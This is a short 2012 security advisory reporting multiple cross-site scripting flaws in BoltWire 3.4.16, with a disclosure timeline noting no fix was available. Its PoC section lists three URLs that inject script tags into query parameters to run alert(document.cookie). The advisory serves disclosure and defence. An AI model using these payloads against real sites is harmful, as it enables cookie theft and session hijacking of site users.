BoltWire 3.4.16 Cross Site Scripting

`Advisory: BoltWire 3.4.16 Multiple XSS vulnerabilities  
Advisory ID: SSCHADV2012-001  
Author: Stefan Schurtz  
Affected Software: Successfully tested on BoltWire 3.4.16  
Vendor URL: http://www.boltwire.com/  
Vendor Status: informed  
  
==========================  
Vulnerability Description  
==========================  
  
BoltWire 3.4.16 is prone to multiple XSS vulnerabilities  
  
==================  
PoC-Exploit  
==================  
  
http://[target]/bolt/field/index.php?p=main&help='"</script><script>alert(document.cookie)</script>  
http://[target]/bolt/field/index.php?"</a><script>alert(document.cookie)</script></  
http://[target]/bolt/field/index.php?p=main&action='"</a><script>alert(document.cookie)</script></&file=file.jpg  
  
=========  
Solution  
=========  
  
-  
  
====================  
Disclosure Timeline  
====================  
  
01-Jan-2012 - vendor informed  
01-Jan-2012 - vendor feedback  
15-Jan-2012 - no fix available  
  
========  
Credits  
========  
  
Vulnerabilities found and advisory written by Stefan Schurtz.  
  
===========  
References  
===========  
  
http://www.darksecurity.de/advisories/2012/SSCHADV2012-001.txt  
`